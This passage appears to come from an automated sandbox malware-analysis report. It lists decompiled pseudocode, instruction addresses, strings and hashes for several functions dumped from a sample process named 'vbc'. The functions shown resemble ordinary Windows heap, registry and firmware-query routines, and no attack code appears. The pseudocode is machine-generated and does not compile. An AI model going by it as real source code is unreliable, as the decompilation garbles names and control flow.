					_v16 = 0;
					_t97 = E015F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E015FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L015BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E015FBB40(_t83, _t102 + 0x24, _t78);
								if(L015C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E015FBB40(_t84, _t102 + 0x24, _t94);
									if(L015C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                  0x015be620
                                                  0x015be628
                                                  0x015be62f
                                                  0x015be631
                                                  0x015be635
                                                  0x015be637
                                                  0x015be63e
                                                  0x01615503
                                                  0x01615503
                                                  0x015be64c
                                                  0x015be64c
                                                  0x015be651
                                                  0x00000000
                                                  0x00000000
                                                  0x015be661
                                                  0x015be665
                                                  0x0161542a
                                                  0x015be715
                                                  0x015be71a
                                                  0x015be71c
                                                  0x015be720
                                                  0x015be720
                                                  0x015be727
                                                  0x015be736
                                                  0x015be736
                                                  0x015be743
                                                  0x015be743
                                                  0x015be673
                                                  0x015be678
                                                  0x015be67d
                                                  0x015be682
                                                  0x015be685
                                                  0x015be692
                                                  0x015be69b
                                                  0x015be6a3
                                                  0x015be6ad
                                                  0x015be6b1
                                                  0x015be6b2
                                                  0x015be6bb
                                                  0x015be6bf
                                                  0x015be6c0
                                                  0x015be6c8
                                                  0x015be6cc
                                                  0x015be6d5
                                                  0x015be6d9
                                                  0x00000000
                                                  0x00000000
                                                  0x015be6e5
                                                  0x015be6ea
                                                  0x015be6f9
                                                  0x015be70b
                                                  0x015be70f
                                                  0x01615439
                                                  0x0161545e
                                                  0x0161545e
                                                  0x00000000
                                                  0x0161545e
                                                  0x0161543b
                                                  0x0161543e
                                                  0x01615440
                                                  0x01615445
                                                  0x01615472
                                                  0x01615475
                                                  0x0161548d
                                                  0x01615493
                                                  0x016154a9
                                                  0x00000000
                                                  0x00000000
                                                  0x016154ab
                                                  0x016154b4
                                                  0x016154bc
                                                  0x016154c8
                                                  0x016154de
                                                  0x016154fb
                                                  0x016154e0
                                                  0x016154e6
                                                  0x016154eb
                                                  0x016154eb
                                                  0x016154de
                                                  0x00000000
                                                  0x016154bc
                                                  0x01615477
                                                  0x0161547a
                                                  0x01615480
                                                  0x01615483
                                                  0x01615486
                                                  0x0161548b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0161548b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01615447
                                                  0x01615447
                                                  0x01615447
                                                  0x01615447
                                                  0x0161544e
                                                  0x00000000
                                                  0x00000000
                                                  0x01615450
                                                  0x01615452
                                                  0x01615455
                                                  0x0161545a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0161545c
                                                  0x0161546a
                                                  0x0161546d
                                                  0x0161546f
                                                  0x00000000
                                                  0x0161546f
                                                  0x015be70f

                                                  Strings
                                                  • @, xrefs: 015BE6C0
                                                  • InstallLanguageFallback, xrefs: 015BE6DB
                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 015BE68C
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                  • API String ID: 0-1757540487
                                                  • Opcode ID: cae2eb94f4a428427b4ee51dc5fd21b86b0849ecbff4a74e050217d6b3a59f8a
                                                  • Instruction ID: 82a031b0aca11a21c50cacab60d965e31c6d52851eca0374e13f71694a1b4f95
                                                  • Opcode Fuzzy Hash: cae2eb94f4a428427b4ee51dc5fd21b86b0849ecbff4a74e050217d6b3a59f8a
                                                  • Instruction Fuzzy Hash: BC5183755053469BD714DF68C880AABB7E8FFC9714F19092EFA86DB240E734D904C7A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DB8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E015DB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x16a8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E015BB150();
						} else {
							E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E015BB150();
						__eflags =  *0x16a7bc8;
						if(__eflags == 0) {
							E01672073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E015DAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                  0x015db8f0
                                                  0x015db8f2
                                                  0x015db8f4
                                                  0x01622c4e
                                                  0x01622c50
                                                  0x01622c56
                                                  0x01622c5c
                                                  0x01622c60
                                                  0x01622c7f
                                                  0x01622c84
                                                  0x01622c62
                                                  0x01622c77
                                                  0x01622c7c
                                                  0x01622c8a
                                                  0x01622c8f
                                                  0x01622c94
                                                  0x01622c9c
                                                  0x01622ca5
                                                  0x01622ca5
                                                  0x01622c9c
                                                  0x01622c50
                                                  0x015db8fa
                                                  0x015db902
                                                  0x015db921
                                                  0x015db921
                                                  0x015db924
                                                  0x015db924
                                                  0x015db927
                                                  0x00000000
                                                  0x00000000
                                                  0x015db929
                                                  0x015db92b
                                                  0x015db92d
                                                  0x015db940
                                                  0x00000000
                                                  0x015db940
                                                  0x015db932
                                                  0x015db932
                                                  0x00000000
                                                  0x015db932
                                                  0x00000000
                                                  0x015db904
                                                  0x015db904
                                                  0x015db90a
                                                  0x015db90c
                                                  0x015db916
                                                  0x015db919
                                                  0x015db915
                                                  0x015db915
                                                  0x015db91b
                                                  0x015db91b
                                                  0x00000000
                                                  0x015db910

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-2558761708
                                                  • Opcode ID: 2f579f5b11151353d1848df78c562f64a6335d50c4908c9a21f220379fb4dfa6
                                                  • Instruction ID: 3744a31c9aa688ff92f901c7ac0f9d03c39801cf9d886d492959fa1338573e3b
                                                  • Opcode Fuzzy Hash: 2f579f5b11151353d1848df78c562f64a6335d50c4908c9a21f220379fb4dfa6
                                                  • Instruction Fuzzy Hash: 651100313055428FDB39DB1DC894B3AB7A6FB81A20F16802DE00ACF341DB70E881CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0167E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E0167E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0167BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0167BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0167AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E015F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0167A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0167A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E015F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0167A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0167A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E015D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E015CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E015CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E015D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0166FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                  0x0167e547
                                                  0x0167e549
                                                  0x0167e54f
                                                  0x0167e553
                                                  0x0167e557
                                                  0x0167e55a
                                                  0x0167e55c
                                                  0x0167e55f
                                                  0x0167e561
                                                  0x0167e567
                                                  0x0167e56b
                                                  0x0167e7e2
                                                  0x00000000
                                                  0x0167e571
                                                  0x0167e575
                                                  0x0167e577
                                                  0x0167e57b
                                                  0x0167e57c
                                                  0x0167e57d
                                                  0x0167e57e
                                                  0x0167e57f
                                                  0x0167e588
                                                  0x0167e58f
                                                  0x0167e591
                                                  0x0167e592
                                                  0x0167e592
                                                  0x0167e596
                                                  0x0167e59e
                                                  0x0167e5a0
                                                  0x0167e5a6
                                                  0x0167e61d
                                                  0x0167e61d
                                                  0x0167e621
                                                  0x0167e623
                                                  0x0167e630
                                                  0x0167e630
                                                  0x0167e7e6
                                                  0x0167e7eb
                                                  0x0167e7ed
                                                  0x0167e7f4
                                                  0x0167e7fa
                                                  0x0167e7ff
                                                  0x0167e7ff
                                                  0x0167e80a
                                                  0x0167e812
                                                  0x0167e812
                                                  0x0167e5ab
                                                  0x0167e5b4
                                                  0x0167e5b9
                                                  0x0167e5be
                                                  0x0167e5c0
                                                  0x0167e5c2
                                                  0x0167e5c8
                                                  0x0167e5c9
                                                  0x0167e5cb
                                                  0x0167e5cc
                                                  0x0167e5d5
                                                  0x0167e5e4
                                                  0x0167e5f1
                                                  0x0167e5f8
                                                  0x0167e5f8
                                                  0x0167e5d5
                                                  0x0167e602
                                                  0x0167e616
                                                  0x0167e63d
                                                  0x0167e644
                                                  0x0167e64d
                                                  0x0167e652
                                                  0x0167e657
                                                  0x0167e659
                                                  0x0167e65b
                                                  0x0167e661
                                                  0x0167e662
                                                  0x0167e664
                                                  0x0167e665
                                                  0x0167e66e
                                                  0x0167e67d
                                                  0x0167e68a
                                                  0x0167e691
                                                  0x0167e691
                                                  0x0167e66e
                                                  0x0167e6b0
                                                  0x00000000
                                                  0x0167e6b6
                                                  0x0167e6bd
                                                  0x0167e6c7
                                                  0x0167e6d7
                                                  0x0167e6d9
                                                  0x0167e6db
                                                  0x0167e6de
                                                  0x0167e6e3
                                                  0x0167e6f3
                                                  0x0167e6fc
                                                  0x0167e700
                                                  0x0167e700
                                                  0x0167e704
                                                  0x0167e70a
                                                  0x0167e70a
                                                  0x0167e713
                                                  0x0167e716
                                                  0x0167e719
                                                  0x0167e720
                                                  0x0167e761
                                                  0x0167e76b
                                                  0x0167e774
                                                  0x0167e77a
                                                  0x0167e77a
                                                  0x0167e78a
                                                  0x0167e791
                                                  0x0167e799
                                                  0x0167e79b
                                                  0x0167e79f
                                                  0x0167e7aa
                                                  0x0167e7c0
                                                  0x0167e7ac
                                                  0x0167e7b2
                                                  0x0167e7b9
                                                  0x0167e7b9
                                                  0x0167e7c7
                                                  0x0167e806
                                                  0x00000000
                                                  0x0167e7c9
                                                  0x0167e7d1
                                                  0x0167e7d8
                                                  0x00000000
                                                  0x0167e7d8
                                                  0x00000000
                                                  0x00000000
                                                  0x0167e722
                                                  0x0167e72e
                                                  0x0167e748
                                                  0x0167e74c
                                                  0x0167e754
                                                  0x0167e756
                                                  0x0167e75c
                                                  0x0167e75c
                                                  0x00000000
                                                  0x0167e75c
                                                  0x0167e758
                                                  0x0167e758
                                                  0x00000000
                                                  0x0167e758
                                                  0x0167e750
                                                  0x00000000
                                                  0x00000000
                                                  0x0167e752
                                                  0x00000000
                                                  0x0167e752
                                                  0x0167e730
                                                  0x0167e735
                                                  0x0167e73d
                                                  0x0167e73f
                                                  0x00000000
                                                  0x00000000
                                                  0x0167e741
                                                  0x0167e741
                                                  0x00000000
                                                  0x0167e741
                                                  0x0167e739
                                                  0x00000000
                                                  0x00000000
                                                  0x0167e73b
                                                  0x00000000
                                                  0x0167e73b
                                                  0x0167e722
                                                  0x0167e720
                                                  0x0167e6b0
                                                  0x0167e618
                                                  0x00000000
                                                  0x0167e618

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction ID: 6c93f6b2c3cf208c0d0c5c579e68f7aabab1e13f7140aec631b2378ba362538f
                                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction Fuzzy Hash: 099170712047429FE724CE69CC41B2BBBE6BF84714F18896DF695CB280E776E908CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016351BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E016351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x16905f0);
				E0160D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E015CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E016353CA(0);
						return E0160D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E015FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E015D3690(1, _t117, 0x1591810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E015FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L015D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E015FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0163500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E015F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                  0x016351be
                                                  0x016351c3
                                                  0x016351c8
                                                  0x016351cd
                                                  0x016351d0
                                                  0x016351d3
                                                  0x016351d8
                                                  0x016351db
                                                  0x016351de
                                                  0x016351e0
                                                  0x016351e3
                                                  0x016351e6
                                                  0x016351e8
                                                  0x01635342
                                                  0x01635351
                                                  0x01635356
                                                  0x0163535a
                                                  0x01635360
                                                  0x01635363
                                                  0x01635366
                                                  0x01635369
                                                  0x01635369
                                                  0x0163536b
                                                  0x0163536b
                                                  0x01635370
                                                  0x016353a3
                                                  0x016353a4
                                                  0x016353a6
                                                  0x016353ab
                                                  0x016353ab
                                                  0x016353ae
                                                  0x016353ae
                                                  0x016353b5
                                                  0x016353bf
                                                  0x016353bf
                                                  0x01635375
                                                  0x01635396
                                                  0x016353a0
                                                  0x016353a0
                                                  0x00000000
                                                  0x01635396
                                                  0x01635377
                                                  0x01635379
                                                  0x0163537f
                                                  0x0163538c
                                                  0x01635390
                                                  0x00000000
                                                  0x01635390
                                                  0x016351ee
                                                  0x016351f1
                                                  0x01635301
                                                  0x01635310
                                                  0x01635315
                                                  0x01635318
                                                  0x0163531b
                                                  0x01635320
                                                  0x0163532e
                                                  0x01635331
                                                  0x00000000
                                                  0x01635331
                                                  0x01635328
                                                  0x01635329
                                                  0x00000000
                                                  0x01635329
                                                  0x016351fa
                                                  0x01635235
                                                  0x01635236
                                                  0x01635239
                                                  0x0163523f
                                                  0x01635240
                                                  0x01635241
                                                  0x01635242
                                                  0x01635246
                                                  0x01635247
                                                  0x0163524e
                                                  0x01635251
                                                  0x01635267
                                                  0x01635269
                                                  0x0163526e
                                                  0x0163527d
                                                  0x0163527e
                                                  0x01635281
                                                  0x01635282
                                                  0x01635287
                                                  0x01635288
                                                  0x0163528a
                                                  0x0163528f
                                                  0x01635294
                                                  0x00000000
                                                  0x00000000
                                                  0x0163529a
                                                  0x0163529c
                                                  0x0163529e
                                                  0x0163529e
                                                  0x016352a4
                                                  0x016352b0
                                                  0x00000000
                                                  0x00000000
                                                  0x016352ba
                                                  0x016352bc
                                                  0x016352bc
                                                  0x016352d4
                                                  0x016352d9
                                                  0x016352dc
                                                  0x016352e1
                                                  0x00000000
                                                  0x00000000
                                                  0x016352e7
                                                  0x016352f4
                                                  0x00000000
                                                  0x016352f4
                                                  0x01635270
                                                  0x00000000
                                                  0x01635270
                                                  0x016351fc
                                                  0x016351fd
                                                  0x01635202
                                                  0x01635203
                                                  0x01635205
                                                  0x0163520a
                                                  0x0163520f
                                                  0x00000000
                                                  0x00000000
                                                  0x0163521b
                                                  0x01635226
                                                  0x0163522b
                                                  0x0163521d
                                                  0x0163521d
                                                  0x01635222
                                                  0x01635222
                                                  0x0163522d
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: d10b9c18ecd05b0a5dcf4702022a630a0b4e5fdcb26578404f11e55fc717f902
                                                  • Instruction ID: 7aa5cdfa60be5ece52b2f5c3da741bee2341ecb6b196768f4c980cfa602e126e
                                                  • Opcode Fuzzy Hash: d10b9c18ecd05b0a5dcf4702022a630a0b4e5fdcb26578404f11e55fc717f902
                                                  • Instruction Fuzzy Hash: D5514D71E006199FEB25DFA8CD80BADBBF9FB88700F14406DE64AEB251E7719941CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 76%
                                                  			E015DB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x16ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
